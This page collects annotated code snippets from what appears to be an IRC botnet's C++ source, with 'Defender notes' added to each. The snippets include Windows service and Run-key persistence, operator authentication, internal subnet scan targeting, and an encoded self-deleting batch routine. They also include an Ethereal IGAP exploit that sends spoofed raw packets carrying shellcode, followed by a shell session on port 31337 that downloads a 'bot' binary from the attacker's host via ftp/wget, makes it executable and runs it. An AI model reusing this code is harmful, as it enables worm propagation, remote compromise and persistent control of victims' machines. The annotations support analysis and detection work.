示例#1
// Persistence routine of the bot's installer: registers a Win32 service on the local
// machine and configures it to be restarted whenever it fails.
//
// sServicename - internal (key) name of the service to create.
// sFilename    - path of the executable; it is quoted in the service command line.
// sParams      - arguments appended after the quoted path.
// Returns true when the service was created and its failure actions were set.
//
// Defender notes: the service is SERVICE_AUTO_START, so it survives reboots; its display
// name comes from the as_valname cvar. A new service install is recorded by the Service
// Control Manager (System log event 7045; Security log event 4697 when that audit policy
// is enabled), and the restart-on-failure setting is stored with the service's
// configuration. All three are useful hunting points for an unexpected auto-start service.
bool CInstaller::ServiceAddInt(CString &sServicename, CString &sFilename, CString &sParams) {
	// SC_MANAGER_ALL_ACCESS needs administrative rights; without them the call fails and
	// no service is installed.
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	// Service image path: "<sFilename>" <sParams>
	CString sSvcCmd; sSvcCmd.Format("\"%s\" %s", sFilename.CStr(), sParams.CStr());
	SC_HANDLE hService=CreateService(hServiceControl, sServicename.CStr(),
		g_pMainCtrl->m_cBot.as_valname.sValue.CStr(), SERVICE_ALL_ACCESS, \
		SERVICE_WIN32_SHARE_PROCESS, SERVICE_AUTO_START, SERVICE_ERROR_NORMAL, \
		sSvcCmd.CStr(), NULL, NULL, NULL, NULL, NULL);
	if(!hService) {
		DWORD dwError=GetLastError();
		if(dwError==ERROR_SERVICE_EXISTS) {
			// A service of that name already exists: delete it and start over through
			// ServiceAdd(), which rebuilds the command line itself (sParams is not passed on).
			// NOTE(review): hService is NULL on this path, so the CloseServiceHandle(hService)
			// call below is handed an invalid handle.
			ServiceDel(sServicename); CloseServiceHandle(hService);
			CloseServiceHandle(hServiceControl);
			return ServiceAdd(sServicename, sFilename);
		} else {
			CloseServiceHandle(hServiceControl); return false; }
	}

	// One failure action: restart the service. SC_ACTION::Delay is in milliseconds, and an
	// INFINITE reset period means the failure counter is never reset.
	SC_ACTION scActions[1]; scActions[0].Delay=1; scActions[0].Type=SC_ACTION_RESTART;
	SERVICE_FAILURE_ACTIONS sfActions; sfActions.dwResetPeriod=INFINITE; sfActions.lpRebootMsg=NULL;
	sfActions.lpCommand=NULL; sfActions.cActions=1; sfActions.lpsaActions=scActions;

	if(!ChangeServiceConfig2(hService, SERVICE_CONFIG_FAILURE_ACTIONS, &sfActions)) {
		// The service stays installed on this path; only the failure actions are missing.
		CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return false;
	}

	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl); return true;
}
示例#2
// Installs the bot as a service whose image is <system directory>\<sFilename>, started
// with the "-service" argument; the actual registration is done by ServiceAddInt().
// Returns false without touching the service database when the global
// m_bHashCheckFailed flag is set.
//
// Defender notes: the image path always points into the Windows system directory, so a
// recently created service whose binary lives there and is launched with "-service" is
// worth a closer look.
// NOTE(review): GetSystemDirectory's return value is not checked; whether
// GetBuffer(MAX_PATH) leaves sysdir in a consistent state depends on the project's
// CString, which is not visible here.
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) {
	// Fail if the hash check failed
	if(g_pMainCtrl->m_bHashCheckFailed) return false;

	CString sysdir; GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	CString sSvcCmd; sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
	CString sSvcParams; sSvcParams.Format("-service");
	return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); }
示例#3
// Variant of the service installer: builds <system directory>\<sFilename> and registers
// it through ServiceAddInt() with the "-netsvcs" argument. Unlike the other ServiceAdd
// listing on this page, this version has no hash-check gate.
//
// Defender notes: the argument string is the only visible difference between variants,
// so a command line ending in "-netsvcs" on a service image in the system directory is a
// hunting pivot for this build.
// NOTE(review): GetSystemDirectory's return value is not checked.
bool CInstaller::ServiceAdd(CString &sServicename, CString &sFilename) 
{
	CString sysdir; 
	GetSystemDirectory(sysdir.GetBuffer(MAX_PATH), MAX_PATH);
	CString sSvcCmd; 
	sSvcCmd.Format("%s\\%s", sysdir.CStr(), sFilename.CStr());
	CString sSvcParams; 
	sSvcParams.Format("-netsvcs");
	return ServiceAddInt(sServicename, sSvcCmd, sSvcParams); 
}
示例#4
文件: mac.cpp 项目: hazcod/botnets
// Operator authentication for the bot's command channel: records a login session for an
// IRC user after checking the supplied password against the stored account.
//
// sUsername    - account name looked up with FindUser().
// sPassword    - cleartext password, verified by CheckPassword().
// sIRCUsername - IRC identity the session is bound to; rejected if already logged in.
// sHost/sIdentd- when non-empty they must equal the values stored on the account.
// Returns true when a login record was appended to llStart, false otherwise.
//
// NOTE(review): Compare() is used here as "non-zero means different" (strcmp-like);
// confirm against the CString class. The login object is heap-allocated and owned by
// llStart from here on.
bool CMac::AddLogin(CString sUsername, CString sPassword, CString sIRCUsername, CString sHost, CString sIdentd)
{	if(FindLogin(sIRCUsername)) return false;
	user *pUser=FindUser(sUsername); if(!pUser) return false;
	if(pUser) if(CheckPassword(sPassword, pUser))
	{	
		// Optional pinning of the session to the host / identd stored for the account
		if(sHost.Compare("")) if(strcmp(sHost.CStr(), pUser->sHost.CStr())!=0) return false;
		if(sIdentd.Compare("")) if(strcmp(sIdentd.CStr(), pUser->sIdentd.CStr())!=0) return false;
		login *pLogin=new login; pLogin->pUser=pUser; pLogin->sUsername=sUsername;
		pLogin->sIRCUsername=sIRCUsername; llStart.push_back(pLogin); return true; }
	return false; }
示例#5
// Removes the bot's autostart entry: deletes the value sValuename from both the
// HKLM ...\CurrentVersion\Run and ...\CurrentVersion\RunServices keys.
// Always returns true; no registry call is checked.
//
// Defender notes: these two keys are the registry autostart locations this installer
// uses, so they are the places to inspect (and to monitor for writes) when looking for or
// cleaning up this persistence.
// NOTE(review): RegCreateKeyEx creates the key if it is missing, so calling this on a
// clean system can leave an empty RunServices key behind. If RegCreateKeyEx fails, key is
// used uninitialised by the two calls that follow.
bool CInstaller::RegStartDel(CString &sValuename) {
	HKEY key;
	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegDeleteValue(key, sValuename.CStr()); 
	RegCloseKey(key); 

	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegDeleteValue(key, sValuename.CStr()); 
	RegCloseKey(key); 

	return true; }
示例#6
// Registry persistence: writes sFilename as a REG_SZ value named sValuename under both
// HKLM ...\CurrentVersion\Run and ...\CurrentVersion\RunServices, so the file is started
// at boot/logon. Returns false only when the global hash-check flag is set; otherwise it
// returns true whether or not the registry writes succeeded.
//
// Defender notes: HKLM requires administrative rights to write. A new value in either key
// that points at a recently dropped executable is the artefact to look for; registry
// auditing or an EDR rule on these two keys covers this routine.
// NOTE(review): none of the registry calls is checked, so the true return value does not
// prove the entry exists.
bool CInstaller::RegStartAdd(CString &sValuename, CString &sFilename) {
	// Fail if the hash check failed
	if(g_pMainCtrl->m_bHashCheckFailed) return false;

	HKEY key;
	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); 
	RegCloseKey(key); 

	RegCreateKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); 
	RegSetValueEx(key, sValuename.CStr(), 0, REG_SZ, (LPBYTE)(const char *)sFilename.CStr(), (DWORD)strlen(sFilename)); 
	RegCloseKey(key);

	return true; }
示例#7
文件: smtp.cpp 项目: hazcod/botnets
// Opens the bot's outbound SMTP session: connects to sHost:iPort, reads the greeting and
// accepts the connection only if the reply starts with "220".
//
// Returns false if a session is already open, the TCP connect fails, nothing is received,
// or the greeting is not a 220; on the last two paths the socket is closed via
// Disconnect(). On success the host/port are stored and m_bConnected is set.
//
// Defender notes: this is plain client-side SMTP from an endpoint. Workstations that open
// direct connections to external mail servers are visible in egress firewall or netflow
// data and can be blocked by policy.
// NOTE(review): a single Recv() of up to 8192 bytes is assumed to contain the start of
// the greeting; the Recv() result is only tested for zero/non-zero.
bool CSMTP_Connection::Connect(CString sHost, int iPort) {
	// Fail if already connected
	if(m_sServerSocket.IsConnected() || m_bConnected) return false;

	// Connect to the server
	if(!m_sServerSocket.Connect(sHost.CStr(), iPort)) {
		// Connection failed
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Failed to connect to \"%s:%d\"!\n", this,
			sHost.CStr(), iPort);
#endif // DBGCONSOLE
		return false;
	}

	// Store server address in member variables
	m_sServerHost.Assign(sHost); m_iServerPort=iPort;

#ifdef DBGCONSOLE
	g_pMainCtrl->m_cConsDbg.Log(3, "CSMTP_Connection(0x%8.8Xh): "
		"Connected to \"%s:%d\"!\n", this,
		m_sServerHost.CStr(), m_iServerPort);
#endif // DBGCONSOLE

	// Receive banner
	CString sRecvBuf;
	if(!m_sServerSocket.Recv(sRecvBuf.GetBuffer(8192), 8192)) {
		// Connection reset
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Connection reset!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Check if connection was accepted
	// (Compare() returning non-zero is treated as "first three characters are not 220")
	if(sRecvBuf.Mid(0, 3).Compare("220")) {
		// Connection not accepted
#ifdef DBGCONSOLE
		g_pMainCtrl->m_cConsDbg.Log(7, "CSMTP_Connection(0x%8.8Xh): "
			"Server rejected connection!\n", this);
#endif // DBGCONSOLE
		Disconnect(); return false;
	}

	// Set connection status to true and return true
	m_bConnected=true; return true;
}
示例#8
文件: mac.cpp 项目: hazcod/botnets
// Ends an operator session: removes one login record from llStart and frees it.
//
// A record matches when its account name equals sUsername OR its IRC name equals
// sIRCUsername (Compare() == 0 is treated as "equal"). The loop does not stop at the
// first hit, so when several records match only the last one is removed.
// Returns true if a record was removed, false if none matched or sUsername has no buffer.
bool CMac::DelLogin(CString sUsername, CString sIRCUsername)
{	if(!sUsername.CStr()) return false; login *pRemove=NULL;
	list<login*>::iterator i; for(i=llStart.begin(); i!=llStart.end(); ++i)
	{	if(!(*i)->sUsername.Compare(sUsername) || !(*i)->sIRCUsername.Compare(sIRCUsername))
			pRemove=(*i); }
	// Removal happens after the scan, so the iterator is never invalidated mid-loop
	if(pRemove) { llStart.remove(pRemove); delete pRemove; return true; }
	return false; }
示例#9
// Queues the infected host's own surroundings for scanning: once the IRC module reports
// that it has joined and a local IP is known, three ranges derived from that address are
// registered - a.b.c.0/24, a.b.0.0/16 and a.0.0.0/8 - with iPriority 80, 90 and 100.
//
// Defender notes: the practical effect is that a compromised machine starts probing its
// own subnet first and then ever wider internal ranges. A single internal host opening
// connections to many neighbours in a short time is the network signature of this step;
// internal segmentation and host firewalls limit how far it reaches.
// NOTE(review): the blocking wait loops poll once a second with no timeout. The third
// loop compares the pointer returned by CStr() with a string literal, not the string
// contents. How iPriority is ordered is not visible here.
void CPortScanner::AddLocalLAN() {
	while(!g_pMainCtrl->m_cIRC.m_bJoined) { Sleep(1000); }
	while(!g_pMainCtrl->m_cIRC.m_sLocalIp.CStr()) { Sleep(1000); }
	CString sLocalIp = g_pMainCtrl->m_cIRC.m_sLocalIp;
	while (sLocalIp.CStr() == "") Sleep(1000);
	// Split the dotted-quad into its four octets (the fourth is parsed but not used below)
	int iLocalPart1=atoi(sLocalIp.Token(0, ".").CStr());
	int iLocalPart2=atoi(sLocalIp.Token(1, ".").CStr());
	int iLocalPart3=atoi(sLocalIp.Token(2, ".").CStr());
	int iLocalPart4=atoi(sLocalIp.Token(3, ".").CStr());

	// a.b.c.0/24
	CNetRange *nRange=new CNetRange;
	nRange->iPart1=iLocalPart1; nRange->iPart2=iLocalPart2; nRange->iPart3=iLocalPart3;
	nRange->iPart4=0; nRange->iNetMask=24; nRange->iPriority=80;
	nRange->bNotice=false; nRange->bSilent=false; nRange->sReplyTo.Assign(""); nRange->pScanner=&g_pMainCtrl->m_cScanner;

	RegisterNetRange(nRange);

	// a.b.0.0/16
	nRange=new CNetRange;
	nRange->iPart1=iLocalPart1; nRange->iPart2=iLocalPart2; nRange->iPart3=0; nRange->iPart4=0;
	nRange->iNetMask=16; nRange->iPriority=90; nRange->bNotice=false; nRange->bSilent=false;
	nRange->sReplyTo.Assign(""); nRange->pScanner=&g_pMainCtrl->m_cScanner;

	RegisterNetRange(nRange);

	// a.0.0.0/8
	nRange=new CNetRange;
	nRange->iPart1=iLocalPart1; nRange->iPart2=0; nRange->iPart3=0; nRange->iPart4=0;
	nRange->iNetMask=8; nRange->iPriority=100; nRange->bNotice=false; nRange->bSilent=false; nRange->sReplyTo.Assign("");
	nRange->pScanner=&g_pMainCtrl->m_cScanner;

	RegisterNetRange(nRange);
}
示例#10
// Counts how many instances of the bot appear to be running.
//
// Windows: walks a Toolhelp process snapshot and counts every process whose executable
// name equals the tail of this module's own path or matches sFilename.
// Other platforms: runs "ps ax | grep <name> | grep -v grep" into the file "psaxtemp" in
// the current directory and returns 1 if that file is non-empty, else 0.
//
// Defender notes: on Unix hosts the "psaxtemp" scratch file and the ps/grep child
// processes are observable side effects of this check.
// NOTE(review): psnap, pe32 and the f* function pointers are not declared in this
// listing (presumably file-level globals resolved at runtime). In the non-Windows branch
// sFilename is formatted into a shell command and passed to system() without quoting,
// and the early "return 1" leaves fp open and the temp file in place.
int GetCopies(CString &sFilename)
{
#ifdef WIN32
	char cFilename[MAX_PATH]; GetModuleFileName(GetModuleHandle(NULL), cFilename, sizeof(cFilename));
	if(fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next)
	{	// 2 is the value of TH32CS_SNAPPROCESS: snapshot of all processes
		psnap=fCreateToolhelp32Snapshot(2, 0);
		if(psnap!=INVALID_HANDLE_VALUE)
		{	int copies=0; pe32.dwSize=sizeof(PROCESSENTRY32);
			if(fProcess32First(psnap, &pe32))
			{	do {	if((strncmp(cFilename+(strlen(cFilename)-strlen(pe32.szExeFile)), \
						pe32.szExeFile, strlen(pe32.szExeFile))==0) || \
						(strncmp(sFilename, pe32.szExeFile, strlen(pe32.szExeFile))==0))
							copies++;
				} while(fProcess32Next(psnap, &pe32)); }
			CloseHandle(psnap);
			return copies; }
		else return 0; }
	else return 0;
#else
	char szCmdBuf[4096]; sprintf(szCmdBuf, "ps ax | grep %s | grep -v grep > psaxtemp", sFilename.CStr());
	system(szCmdBuf); FILE *fp=fopen("psaxtemp", "r"); if(!fp) return 0;
	// File size > 0 means grep printed at least one matching process line
	fseek(fp, 0, SEEK_END); long lFileSize=ftell(fp); fseek(fp, 0, SEEK_SET);
	if(lFileSize>0) return 1;
	fclose(fp); system("rm -f psaxtemp"); return 0;
#endif // WIN32
}
示例#11
// Sends the attack traffic for one entry of the targets[] table (index iOffset): a
// hand-built raw IP datagram carrying an IGAP message, transmitted MAX_PACKET times to
// the scanner's current host. Returns false if the raw socket cannot be set up or an
// address fails to parse, true once the packets have been handed to sendto().
//
// Defender notes (what this looks like on the wire, as far as the code shows): datagrams
// of MAX_BUFF bytes with IP protocol IPPROTO_IGAP, TTL 1, IP id 54321 before byte-order
// conversion, and a source address made of four random octets - so the source field is
// not attributable. The IGAP body is padded with 0x90 bytes. Judging by the class name,
// the target is presumably a packet-analysis tool parsing IGAP; keeping such tools
// patched and not running captures with root privileges are the relevant mitigations.
// The advisory or CVE id is not given on this page.
// NOTE(review): ipheader, igap_header, targets[], the shellcode buffers and the
// MAX_BUFF / RETOFFSET / PAYLOAD_SIZE constants are defined outside this listing, so the
// buffer arithmetic below cannot be checked from here. sendto() results are ignored.
bool CScannerEthereal::ExploitInt(int iOffset) {
	char buffer[MAX_BUFF]; ipheader *iphdr=(ipheader*)buffer; igap_header *igaphdr=(igap_header*)(buffer+sizeof(ipheader));
	unsigned long magic=targets[iOffset].ret; CString sRandomIp; int one=1; const int *val=&one; sockaddr_in sin;

	// Raw socket with IP_HDRINCL: the caller supplies the IP header itself (needs root)
	memset(buffer, 0x00, MAX_BUFF); int sockfd=socket(PF_INET, SOCK_RAW, IPPROTO_RAW); if(sockfd==SOCKET_ERROR) return false;
	if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one))<0) { close(sockfd); return false; }
	init_random(); sRandomIp.Format("%d.%d.%d.%d", brandom(0, 255), brandom(0, 255), brandom(0, 255), brandom(0, 255));

	sin.sin_addr.s_addr=inet_addr(m_sSocket.m_szHost); sin.sin_family=AF_INET; sin.sin_port=0x00;
	
	// IP header fields
	iphdr->ip_hl=0x05; iphdr->ip_v=0x04; iphdr->ip_tos=0x00; iphdr->ip_len=MAX_BUFF; iphdr->ip_id=htonl(54321);
	iphdr->ip_off=0x00; iphdr->ip_ttl=0x01; iphdr->ip_proto=IPPROTO_IGAP; iphdr->ip_sum=0x00;
	iphdr->ip_src=inet_addr(sRandomIp.CStr()); iphdr->ip_dst=inet_addr(m_sSocket.m_szHost);
	if(iphdr->ip_src==SOCKET_ERROR || iphdr->ip_dst==SOCKET_ERROR) { close(sockfd); return false; }

	// IGAP header fields
	igaphdr->igap_type=0x41; igaphdr->igap_restime=0x0a; igaphdr->igap_cksum=0x00; igaphdr->igap_gaddr=0x00;
	igaphdr->igap_ver=0x01; igaphdr->igap_stype=0x21; igaphdr->igap_reserved1=0x00; igaphdr->igap_cid=0x00;
	igaphdr->igap_asize=0x10; igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; igaphdr->igap_reserved2=0x00;

	// Payload area: filled, then overlaid with buffers and values defined elsewhere
	memset(igaphdr->igap_payload, 0x90, 16+64+PAYLOAD_SIZE);
	memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8, shellcode_firsthalf, strlen(shellcode_firsthalf));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4, jumpcode, strlen(jumpcode));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET, &magic, 4); magic-=0x10;
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4, &magic, 4);
	memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1, shellcode_secondhalf, strlen(shellcode_secondhalf));

	// Checksums are computed last, over the finished headers
	igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)), (sizeof(struct igap_header))>>1);
	iphdr->ip_sum=checksum((unsigned short*)buffer, (iphdr->ip_len)>>1);

	// The same datagram is sent MAX_PACKET times
	one=MAX_PACKET; while(one) {
		sendto(sockfd, buffer, MAX_BUFF, 0, (sockaddr*)&sin, sizeof(sin)); one--; }
	close(sockfd); return true; }
示例#12
// Spreading routine of the Ethereal scanner module: sends the attack traffic for
// targets[0..3] via ExploitInt(), then tries to reach a shell on TCP port 31337 of the
// same host and, if the connect succeeds, writes three shell command lines that fetch a
// file named "bot" from the attacking bot's own FTP port and try to run it.
// Returns true only if the connection to port 31337 was established.
//
// Preconditions visible in the code: the process must run as root (getuid() == 0), and a
// private-address target is skipped when the bot's own address is not private.
//
// Defender notes: indicators that follow from this listing are an inbound burst of IGAP
// datagrams followed by a TCP connection to port 31337 on the same host; on the victim,
// "ftp -n" or "wget ftp://bla:bla@<host>:<port>/bot" running as a child of the capture
// process, and a world-writable (mode 777) file "bot" in its working directory. Egress
// filtering of FTP from analysis hosts breaks the download step.
// NOTE(review): replies from the remote side are read and discarded; nothing verifies
// that any command succeeded.
bool CScannerEthereal::Exploit() {
	if(!IsPrivate(g_pMainCtrl->m_pIRC->m_sLocalIp.CStr()) && IsPrivate(m_sSocket.m_szHost)) return false;

	// We need root to exploit this cause we need to spoof packets
	if(getuid()) return false;

	ExploitInt(0); ExploitInt(1); ExploitInt(2); ExploitInt(3);
	
	CSocket sShellSocket; if(sShellSocket.Connect(m_sSocket.m_szHost, 31337)) {
		// Initial read with a 2000 timeout argument (unit not visible here), then the commands
		CString sCmdBuf; sShellSocket.RecvTO(sCmdBuf.GetBuffer(8192), 8192, 2000);
		sCmdBuf.Format("echo -e open %s %d\\nuser ftp bla\\nget bot\\nquit\\n | ftp -n\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Format("wget ftp://bla:bla@%s:%d/bot\n", g_pMainCtrl->m_pIRC->m_sLocalHost.CStr(), g_pMainCtrl->m_pBot->bot_ftrans_port_ftp.iValue);
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sCmdBuf.Assign("chmod 777 ./bot ; ./bla\n");
		sShellSocket.Write(sCmdBuf.CStr(), sCmdBuf.GetLength()); sShellSocket.Recv(sCmdBuf.GetBuffer(8192), 8192);
		sShellSocket.Disconnect(); return true; } else return false; }
示例#13
文件: mac.cpp 项目: hazcod/botnets
// Verifies an operator password: hashes sPassword with MD5, renders the 16 digest bytes
// as 32 upper-case hex characters and compares the result with pUser->sPassword.
// Returns true on a match (Compare() == 0), false otherwise or when sPassword has no
// buffer.
//
// Analyst notes: the stored credential is a single unsalted MD5 digest in upper-case hex,
// which is what to look for when extracting the account table from a sample's
// configuration. The comparison is a plain string compare.
// NOTE(review): pUser is dereferenced without a null check; the visible caller
// (AddLogin) checks it beforehand.
bool CMac::CheckPassword(CString sPassword, user *pUser)
{	if(!sPassword.CStr()) return false;
	md5::MD5_CTX md5; md5::MD5Init(&md5); unsigned char szMD5[16]; CString sMD5; sMD5.Assign("");
	md5::MD5Update(&md5, (unsigned char*)sPassword.Str(), sPassword.GetLength());
	// Hex-encode the digest, two upper-case digits per byte
	md5::MD5Final(szMD5, &md5); for(int i=0;i<16;i++)
	{	CString sTemp; sTemp.Format("%2.2X", szMD5[i]); sMD5.Append(sTemp); }
	if(!pUser->sPassword.Compare(sMD5)) return true;
	return false; }
示例#14
// Self-removal: on Windows, writes a batch file into the temp directory and launches it
// through the command interpreter with the bot's own executable path as argument. Per
// the inline comments, the batch loops deleting %1 until the file no longer exists and
// then deletes itself. The non-Windows branch is empty. Always returns true.
//
// The batch text and file name are not stored in clear: every string is produced by
// dp(...), a decoder defined outside this listing, so they do not show up in a plain
// strings dump of the binary. Going by the letter codes that the inline comments imply,
// the batch file name is presumably "afro.bat" - confirm against dp().
//
// Defender notes: the observable behaviour is a short-lived "%comspec% /c <temp>\*.bat
// <image path>" child process started detached, followed by the disappearance of the
// parent's image file. Process-creation logging with command lines captures this even
// though the files themselves are gone afterwards.
// NOTE(review): WriteFile is always asked to write exactly 105 bytes regardless of the
// length of sBat. CreateFile failure is tested with "f > (HANDLE)0" rather than against
// INVALID_HANDLE_VALUE. The handles in pinfo are never closed.
bool CInstaller::Uninstall()
{
#ifdef WIN32
	HANDLE f; DWORD r;
	PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
	char cmdline[MAX_PATH]; char tcmdline[MAX_PATH]; char cfilename[MAX_PATH];
	char batfile[MAX_PATH]; char tempdir[MAX_PATH];

	GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));
	GetTempPath(sizeof(tempdir), tempdir);

	// <temp dir>\<decoded batch file name>
	sprintf(batfile, "%s\\%s", tempdir, dp(1,6,18,15,79,2,1,20,0).CStr());
	f = CreateFile(batfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, 0);
	if (f > (HANDLE)0) {
		// write a batch file to remove our executable once we close
			/*WriteFile(f, "@echo off\r\n"
					 ":start\r\nif not exist \"\"%1\"\" goto done\r\n"
					 "del /F \"\"%1\"\"\r\n"
					 "del \"\"%1\"\"\r\n"
					 "goto start\r\n"
					 ":done\r\n"
					 "del /F %temp%\r.bat\r\n"
					 "del %temp%\r.bat\r\n", 105, &r, NULL);*/
			CString sBat;
			sBat.Format("%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r\n%s\r%s\r\n%s\r%s\r\n",
			dp(86,5,3,8,15,78,15,6,6,0).CStr(),	// @echo off
			dp(83,19,20,1,18,20,0).CStr(),		// :start
			// if not exist ""%1"" goto done
			dp(9,6,78,14,15,20,78,5,24,9,19,20,78,84,84,57,69,84,84,78,7,15,20,15,78,4,15,14,5,0).CStr(),
			dp(4,5,12,78,82,32,78,84,84,57,69,84,84,0).CStr(),	// del /F ""%1""
			dp(4,5,12,78,84,84,57,69,84,84,0).CStr(),			// del ""%1""
			dp(7,15,20,15,78,19,20,1,18,20,0).CStr(),			// goto start
			dp(83,4,15,14,5,0).CStr(),							// :done
			dp(4,5,12,78,82,32,78,57,20,5,13,16,57,0).CStr(),	// del /F %temp%
			dp(79,2,1,20,0).CStr(),								// .bat
			dp(4,5,12,78,57,20,5,13,16,57,0).CStr(),			// del %temp%
			dp(79,2,1,20,0).CStr());							// .bat

		WriteFile(f, sBat.CStr(), 105, &r, NULL);

		CloseHandle(f);

		memset(&sinfo, 0, sizeof(STARTUPINFO));
		sinfo.cb = sizeof(sinfo);
		sinfo.wShowWindow = SW_HIDE;

		GetModuleFileName(GetModuleHandle(NULL), cfilename, sizeof(cfilename));// get our file name
		sprintf(tcmdline, "%%comspec%% /c %s %s", batfile, cfilename); // build command line
		ExpandEnvironmentStrings(tcmdline, cmdline, sizeof(cmdline)); // put the name of the command interpreter into the command line

		// execute the batch file
		CreateProcess(NULL, cmdline, NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo);
	}
#else
	// Linux
#endif // WIN32
	return true;
}
示例#15
// Reports whether a service named sServicename exists on the local machine, by trying to
// open it. Returns true if OpenService succeeds, false if the SCM or the service cannot
// be opened.
//
// NOTE(review): both handles are requested with full access (SC_MANAGER_ALL_ACCESS /
// SERVICE_ALL_ACCESS), so a caller without administrative rights gets false even when
// the service is present - "false" means "cannot open", not strictly "not installed".
bool CInstaller::IsInstalled(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);

	return true;
}
示例#16
// Removes the service sServicename from the local machine: sends it a stop request and
// then marks it for deletion. Returns false if the SCM or the service cannot be opened,
// true otherwise.
//
// NOTE(review): the results of ControlService and DeleteService are ignored, so true
// does not guarantee that the service was stopped or deleted. Windows only removes a
// service marked for deletion once all open handles to it are closed.
bool CInstaller::ServiceDel(CString &sServicename) {
	SC_HANDLE hServiceControl=OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, SC_MANAGER_ALL_ACCESS);
	if(!hServiceControl) return false;

	SC_HANDLE hService=OpenService(hServiceControl, sServicename.CStr(), SERVICE_ALL_ACCESS);
	if(!hService) { CloseServiceHandle(hServiceControl); return false; }
	SERVICE_STATUS sStatus; ControlService(hService, SERVICE_CONTROL_STOP, &sStatus);
	DeleteService(hService); CloseServiceHandle(hService); CloseServiceHandle(hServiceControl);

	return true;
}
示例#17
// Start-up of the bot core: picks two random port numbers, registers the configuration
// variables and the "bot.*" command handlers, applies the compiled-in configuration via
// Config(), generates a nickname and records the start time in seconds.
//
// REGCVAR and REGCMD are macros defined outside this listing; from their use here they
// take (variable, default value, description, ...) and (handler member, command name,
// help text, ...) respectively - the meaning of the trailing arguments is not visible.
//
// Defender notes: the command names registered below are the vocabulary of the control
// channel, so they double as content signatures when the IRC traffic is unencrypted.
// Several of them give the operator execution on the host (bot.execute, bot.open,
// bot.command) or change its security posture (bot.secure / bot.unsecure). The two
// file-transfer ports are chosen at random in the range passed to brandom(), i.e. they
// differ per infected host.
void CBot::Init()
{	init_random();
	CString sTemp;		sTemp.Format("%d", brandom(500, 22226));
	CString sTempFTP;	sTempFTP.Format("%d", brandom(500, 22226));

	// Configuration variables; the si_* entries start empty and are filled by Config()
	REGCVAR(bot_ftrans_port,		sTemp.CStr(),		"Bot - File Transfer Port",			false,	false,	0	);
	REGCVAR(bot_ftrans_port_ftp,	sTempFTP.CStr(),	"Bot - File Transfer Port for FTP",	false,	false,	0	);
	REGCVAR(si_chanpass,			"",					"Server Info - Channel Password",	false,	false,	0	);
	REGCVAR(si_mainchan,			"",					"Server Info - Main Channel",		false,	false,	0	);
	REGCVAR(si_nickprefix,			"",					"Server Info - Nickname prefix",	false,	false,	0	);
	REGCVAR(si_port,				"",					"Server Info - Server Port",		false,	false,	0	);
	REGCVAR(si_server,				"",					"Server Info - Server Address",		false,	false,	0	);
	REGCVAR(si_servpass,			"",					"Server Info - Server Password",	false,	false,	0	);
	REGCVAR(si_usessl,				"",					"Server Info - Use SSL ?",			false,	false,	0	);

	Config();

	// Command handlers exposed on the control channel
	REGCMD(m_cmdAbout,			"bot.about",		"...",	false,	this);
